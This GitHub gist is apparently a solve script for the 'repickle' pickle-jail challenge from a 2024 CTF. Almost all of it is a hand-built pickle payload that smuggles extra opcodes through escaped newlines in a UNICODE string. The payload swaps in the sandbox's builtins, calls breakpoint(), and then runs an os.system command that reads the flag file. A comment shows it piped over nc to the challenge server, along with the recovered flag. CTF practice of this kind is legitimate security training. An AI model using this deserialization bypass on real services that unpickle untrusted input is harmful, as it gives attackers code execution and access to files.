@lebr0nli
Last active September 12, 2024 02:28
CyberSpace CTF 2024 - repickle (jail)

import pickle

# Opcode fragment that will be smuggled inside a string argument. Each GLOBAL
# opcode reads "module\nname\n" and pushes getattr(module, name).
smuggled = (
    pickle.GLOBAL + b"sandbox\ny\n"               # push sandbox.y
    + pickle.GLOBAL + b"sandbox\n__builtins__\n"  # push sandbox.__builtins__
    + pickle.BUILD                                # BUILD: apply that dict as state to sandbox.y
    + pickle.GLOBAL + b"sandbox\nbreakpoint\n"    # push sandbox.breakpoint
    + pickle.EMPTY_TUPLE
    + pickle.REDUCE                               # call it with no arguments
)

# The UNICODE opcode reads one line and decodes it with raw-unicode-escape, so
# an escaped "\u000a" turns back into a newline inside the decoded string while
# the opcode's own line stays free of literal newlines.
smuggled = smuggled.replace(b"\n", b"\\u000a")
fake_unicode_attr = b"__doc__\\u000a" + smuggled + b"\n"

payload = (
    pickle.PROTO + b"\x04"
    + pickle.GLOBAL + b"x\nsandbox\n"             # push x.sandbox
    + pickle.MARK
    + pickle.NONE
    + pickle.EMPTY_DICT
    + pickle.UNICODE + fake_unicode_attr          # key: "__doc__\n<smuggled opcodes>"
    + pickle.GLOBAL + b"x\nSandboxClass\n"        # value: x.SandboxClass
    + pickle.SETITEM
    + pickle.UNICODE + b"y\n"                     # key: "y"
    + pickle.GLOBAL + b"x\nsandbox\n"             # value: x.sandbox
    + pickle.SETITEM
    + pickle.TUPLE                                # state = (None, {...})
    + pickle.BUILD                                # (None, dict) state: setattr() each pair on x.sandbox
    + pickle.POP
    + pickle.MARK
    + pickle.GLOBAL + b"x\nSandboxClass\n"        # push x.SandboxClass
    + pickle.MARK
    + pickle.NONE
    + pickle.EMPTY_DICT
    + pickle.UNICODE + b"__qualname__\n"
    + pickle.UNICODE + fake_unicode_attr
    + pickle.SETITEM
    + pickle.TUPLE
    + pickle.BUILD                                # SandboxClass.__qualname__ = fake_unicode_attr
    + pickle.EMPTY_TUPLE
    + pickle.REDUCE                               # SandboxClass()
    + pickle.BININT1 + b"\x02"
    + pickle.TUPLE                                # (instance, 2)
    + pickle.STOP
)

# The challenge enforces a size limit on the submitted pickle.
assert len(payload) < 318, f"Payload too long: {len(payload)}"
print(payload.hex())
# Second line is fed to the breakpoint() prompt once the smuggled opcodes run.
print("import os;os.system('cat flag.txt')")
# $ python3 solve.py | nc repickle.challs.csc.tf 1337
# CSCTF{repickle_601c2ab4c856c}